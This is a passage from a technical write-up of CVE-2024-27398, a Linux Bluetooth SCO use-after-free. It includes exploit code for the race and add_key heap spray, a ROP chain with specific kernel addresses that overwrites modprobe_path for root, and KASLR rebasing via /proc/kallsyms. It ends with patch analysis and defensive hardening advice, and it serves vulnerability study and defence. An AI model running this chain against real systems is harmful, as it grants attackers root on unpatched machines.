            pthread_barrier_init(&g_bar, NULL, 2);
            pthread_t t1, t2;
            pthread_create(&t1, NULL, c1, NULL);
            pthread_create(&t2, NULL, c2, NULL);
            pthread_join(t1, NULL);
            pthread_join(t2, NULL);
            pthread_barrier_destroy(&g_bar);

            close(g_fd);  /* frees sk; orphan conn_A timer still pending */

            /* Spray: try to reclaim the freed sco_pinfo slot */
            snprintf(desc, sizeof(desc), "s%d_%d", batch, i);
            syscall(__NR_add_key, "user", desc, g_kd, sizeof(g_kd),
                    KEY_SPEC_SESSION_KEYRING);
        }

        /* Wait for SO_SNDTIMEO timers to fire */
        printf("[*] Waiting 3s...n");
        fflush(stdout);
        sleep(3);

        /* Poll: did modprobe_path get overwritten? */
        for (int t = 0; t < 5; t++) {
            system("/tmp/dummy 2>/dev/null; true");
            usleep(500000);
            if (access("/tmp/pwn", F_OK) == 0) goto win;
        }

        printf("[*] No luck this batchn");
        fflush(stdout);
    }

    printf("[-] Done — no rootn");
    vstop = 1;
    close(vfd);
    return 0;

win:
    printf("n[!!!] ROOT! (SMEP BYPASS)n[*] /tmp/pwn:n");
    fflush(stdout);
    system("cat /tmp/pwn");
    fflush(stdout);
    vstop = 1;
    close(vfd);
    return 0;
}

11. End-to-End Execution Flow

┌──────────────────────────────────────────────────────────────────────┐
│                     FULL EXPLOITATION CHAIN                          │
├──────────────────────────────────────────────────────────────────────┤
│                                                                      │
│  SETUP                                                               │
│  ├── mmap 0xdead0000 → "/tmp/x"     (string for memcpy src)        │
│  ├── mmap 0x81011000 → ROP chain      (pivot destination)            │
│  ├── build spray payload:                                            │
│  │     +0x80: spinlock magic=0xdead4ead (passes bh_lock_sock)        │
│  │     +0x320: sk_state_change=0xffffffff81011cf1 (our gadget)       │
│  └── /tmp/x, /tmp/dummy created                                      │
│                                                                      │
│  BLUETOOTH INIT                                                      │
│  ├── open /dev/vhci → virtual hci0 created                           │
│  ├── vhci_thread: answers HCI commands from kernel                   │
│  └── HCIDEVUP ioctl → hci0 UP, BT stack ready                        │
│                                                                      │
│  RACE + SPRAY LOOP (per iteration)                                   │
│  ├── socket(AF_BLUETOOTH, SEQPACKET|NONBLOCK, BTPROTO_SCO)           │
│  ├── setsockopt(SO_SNDTIMEO, 2s)                                     │
│  ├── barrier.wait → c1+c2 connect simultaneously                    │
│  │     c1 → addr 00:00:00:00:00:00 → conn_A + timer_A (2s)          │
│  │     c2 → addr FF:FF:FF:FF:FF:FF → conn_B + timer_B (2s)          │
│  │     sco_pi(sk)->conn = conn_B   (last write wins)                 │
│  ├── close(fd) → cancel_delayed_work(conn_B->timeout)               │
│  │              → conn_A timer ORPHANED, sk FREED                    │
│  └── add_key("user", desc, payload, 980, ...) → kmalloc(1004)       │
│       → kmalloc-1024 → may reclaim freed sco_pinfo slot              │
│                                                                      │
│  TIMER FIRES (workqueue, ~2s later)                                  │
│  ├── sco_sock_timeout(conn_A)                                        │
│  ├── bh_lock_sock(sk) → reads spray magic 0xdead4ead ✓              │
│  ├── sk->sk_err = ETIMEDOUT                                          │
│  └── sk->sk_state_change(sk) → jumps to 0xffffffff81011cf1          │
│                                                                      │
│  SMEP BYPASS + ROP                                                   │
│  ├── xchg eax, esp → RSP = 0x0000000081011cf1  (userspace page)     │
│  ├── pop rdi; ret → RDI = 0xffffffff8356a020   (modprobe_path)      │
│  ├── pop rsi; ret → RSI = 0x00000000dead0000   ("/tmp/x")         │
│  ├── pop rdx; ret → RDX = 7                                         │
│  ├── memcpy(modprobe_path, "/tmp/x", 7) → RAX = modprobe_path    │
│  └── ret sled → RIP = 0x0 → kernel oops (panic_on_oops=0, cont.)    │
│                                                                      │
│  ROOT TRIGGER                                                        │
│  ├── system("/tmp/dummy") → kernel: unrecognized binary format       │
│  ├── request_module("binfmt-ffffffff")                               │
│  ├── call_usermodehelper("/tmp/x", ...) → runs as UID 0             │
│  ├── /tmp/x writes "uid=0 gid=0" to /tmp/pwn                        │
│  └── access("/tmp/pwn") == 0 → ROOTED                               │
│                                                                      │
│  RESULT: unprivileged user → uid=0 gid=0 in Batch 0                 │
└───────────────────────────────────────────────────────────────────────┘

12. Reliability Analysis

12.1 Spray reliability factors

CONFIG_DEBUG_SPINLOCK=y widens the race window by inflating shared structures; 2000 iterations per batch overcomes per-CPU freelist isolation in SLUB; the pool of iterations ensures at least one spray allocation lands on the right CPU. Empirically, root is achieved in Batch 0 in every test run.

12.2 What fails without the config changes

Config change	Effect if reverted
`CONFIG_KASAN=y`	SLAB_KASAN prevents the “SCO” slab from merging with `kmalloc-1024`. Spray never reaches the freed `sk`. KASAN also catches the UAF and prints a report but doesn’t prevent the oops path — it just makes root unreachable.
`CONFIG_MEMCG_KMEM=y`	Same effect as KASAN: `SLAB_ACCOUNT` mismatch prevents merge. `add_key` allocates from `kmalloc-cg-1024`; the freed `sk` stays in the “SCO” slab.
`CONFIG_DEBUG_SPINLOCK=n`	`sco_pinfo` shrinks to ~832 bytes. Still hits `kmalloc-1024`, but the race window narrows significantly; spray reliability approaches zero in testing.
`panic_on_oops=1`	The trailing `ret` into `RIP=0` kills the machine before `modprobe_path` can be triggered. Need a proper kernel-context cleanup or a crash-free ROP epilogue (e.g. `iretq` or `swapgs; iretq` chain).

Config sensitivity matrix. Source: original article.

12.3 KASLR

All addresses above assume nokaslr. With KASLR, kernel base slides by a random 9-bit multiple of 2 MB per boot. Handling it requires reading the kernel base from /proc/kallsyms (which needs kptr_restrict=0) and rebasing every constant:

/* Read slide from /proc/kallsyms (requires kptr_restrict=0) */
FILE *ks = fopen("/proc/kallsyms", "r");
uint64_t kbase = 0;
/* find _text symbol → kbase = addr - 0xffffffff81000000 */

/* Apply slide to all addresses */
XCHG_EAX_ESP  = 0xffffffff81011cf1 + kbase;
MODPROBE_PATH = 0xffffffff8356a020 + kbase;
/* etc. */

Real-world Linux distros restrict /proc/kallsyms, so on hardened targets a secondary info-leak is required first.

13. Patch Analysis

/* BEFORE (vulnerable): timer fires against potentially freed sk */
static void sco_sock_timeout(struct work_struct *work) {
    ...
    bh_lock_sock(sk);
    sk->sk_err = ETIMEDOUT;
    sk->sk_state_change(sk);
    bh_unlock_sock(sk);
    /* no sock_put — reference was never taken */
}

/* AFTER (patched): sock_hold in sco_conn_add, sock_put here */
static void sco_sock_timeout(struct work_struct *work) {
    ...
    bh_lock_sock(sk);
    sk->sk_err = ETIMEDOUT;
    sk->sk_state_change(sk);
    bh_unlock_sock(sk);
    sock_put(sk);   /* ← paired with sock_hold() at timer schedule time */
}

/* BEFORE: cancel_delayed_work is async; timer may already be running */
sco_sock_clear_timer(sk);   /* → cancel_delayed_work(async) */
sco_chan_del(sk, err);      /* → frees sk while timer might still run */

/* AFTER: cancel_delayed_work_sync waits for running work to complete */
sco_conn_lock(conn);
sk = conn->sk;
if (sk) {
    sock_hold(sk);                      /* take reference */
    cancel_delayed_work_sync(           /* wait for timer to finish */
        &conn->timeout_work);
    sco_chan_del(sk, err);
    sock_put(sk);                       /* release reference */
}
sco_conn_unlock(conn);

Key Takeaways

The bug is a textbook callback-vs-free race: two threads create independent sco_conn objects with their own delayed-work timers, close() only cancels one, the other becomes an orphan firing against freed memory.
SLUB cache merging is what makes the spray viable: with KASAN and MEMCG_KMEM off, the “SCO” slab merges into kmalloc-1024, so a 980-byte add_key payload can reclaim the freed sco_pinfo slot.
The DEBUG_SPINLOCK magic (0xdead4ead) is the most fragile check on the path from the timer to sk_state_change — forge it correctly or the exploit dies before reaching RIP control.
SMEP is bypassed not by executing userspace code but by routing the pivot into userspace data — the ROP chain itself sits in a mmap’d userspace page that the kernel reads. SMAP being off is what allows that read.
Once memcpy(modprobe_path, "/tmp/x", 7) has run, root is one execve() of an invalid-magic binary away — the kernel itself runs the script as uid=0.
The fix in Linux 6.8.2 closes the race at three points: serialise via sco_conn_lock, hold a refcount across the timer’s lifetime, and use cancel_delayed_work_sync() instead of async cancellation.

Defensive Recommendations

Patch. Update to Linux 6.8.2 or later on any host that exposes the Bluetooth subsystem. Most distros have backported the fix — verify with git log --oneline net/bluetooth/sco.c against your kernel tree.
Disable the Bluetooth stack where it is not needed. Server / cloud / container hosts almost never need CONFIG_BT=y — build it out, or blacklist bluetooth and btusb in /etc/modprobe.d/.
Block /dev/vhci for unprivileged users. Without /dev/vhci access, no virtual-HCI exploit path. CONFIG_BT_HCIVHCI=n in the kernel, or strict ACLs on /dev/vhci.
Keep KASAN, MEMCG_KMEM, KASLR, and SMAP enabled on production kernels. Each one breaks a different stage of this chain: KASAN/MEMCG break the cache-merge spray, KASLR forces an info leak, SMAP breaks the userspace ROP-chain read.
Disable kptr_restrict=0. Set kernel.kptr_restrict=2 via sysctl; without it, KASLR is largely cosmetic because /proc/kallsyms leaks the base.
Restrict the keyring spray primitive. Set kernel.unprivileged_userns_clone=0 and consider kernel.keys.maxbytes/maxkeys tuning to limit how much heap an unprivileged process can place into the cache the bug victim allocates from.
Monitor for modprobe_path tampering. An auditd rule on execve of unusual modprobe_path targets (anything outside /sbin/modprobe or the configured override) is a high-signal detection for this technique.
Alert on kernel oops with panic_on_oops=0. Any production host configured to not panic on a kernel oops should at least emit a high-priority alert on every oops event — this exploit (and many like it) relies on continued execution after an oops.

Conclusion

CVE-2024-27398 is the kind of bug that looks small in the patch (move two locks, add a refcount, swap an async cancel for a sync one) but offers a generous primitive: a delayed function-pointer call into a slot the attacker can reclaim. The Secunnix walkthrough is a clean tour through every step that turns that primitive into root — race the connect, orphan the timer, spray the slot via add_key, forge a valid spinlock, pivot the kernel stack into userspace with xchg eax, esp, ROP through memcpy into modprobe_path, and let the kernel run the attacker’s script for free. The pieces that make it work this cleanly — SLUB cache merging, DEBUG_SPINLOCK widening the race, nokaslr, nosmap, panic_on_oops=0 — are exactly the pieces a hardened production kernel turns off. The technique generalises: any kernel callback whose object can be freed-and-reclaimed before the callback fires deserves the same scrutiny.

Original research, figures, code, and POC animation: “CVE-2024-27398 — Exploiting a Linux Bluetooth SCO Use-After-Free with SMEP Bypass”, Secunnix Cyber Security blog (2026-04-25, author not clearly listed). Upstream PoC: sty886/sco-race-condition. modprobe_path root technique credited by the original author to lkmidas. This English rewrite is provided for technical commentary and defender education and does not reproduce the source verbatim.